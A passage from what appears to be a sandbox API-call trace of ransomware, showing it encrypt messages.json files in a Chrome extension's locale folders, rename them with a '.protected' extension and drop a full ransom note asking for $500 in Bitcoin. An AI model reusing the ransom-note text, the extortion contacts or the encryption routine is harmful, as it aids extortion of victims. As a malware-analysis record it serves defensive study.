Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.350] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.351] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.351] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.351] CloseHandle (hObject=0x168) returned 1 [0079.351] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected") returned 166 [0079.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected")) returned 1 [0079.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.352] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\RESTORE_FILES.txt") returned 160 [0079.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.352] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.352] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.353] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.353] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.353] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.353] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.354] CloseHandle (hObject=0x164) returned 1 [0079.354] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0079.354] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi") returned 142 [0079.354] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0079.354] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0079.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*") returned 144 [0079.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.354] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.354] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\.") returned 144 [0079.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.355] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.355] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.355] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.355] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\..") returned 145 [0079.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.355] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.355] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.355] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.356] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.356] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x159, lpOverlapped=0x0) returned 1 [0079.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffea7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x159, lpOverlapped=0x0) returned 1 [0079.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.357] CloseHandle (hObject=0x168) returned 1 [0079.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected") returned 166 [0079.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0079.358] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.358] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 160 [0079.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.358] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.359] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.359] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.359] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.359] CloseHandle (hObject=0x164) returned 1 [0079.359] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.359] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0079.359] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr") returned 142 [0079.360] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0079.360] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*") returned 144 [0079.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.360] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\.") returned 144 [0079.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.360] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\..") returned 145 [0079.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.360] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.361] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x107, lpOverlapped=0x0) returned 1 [0079.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x107, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | 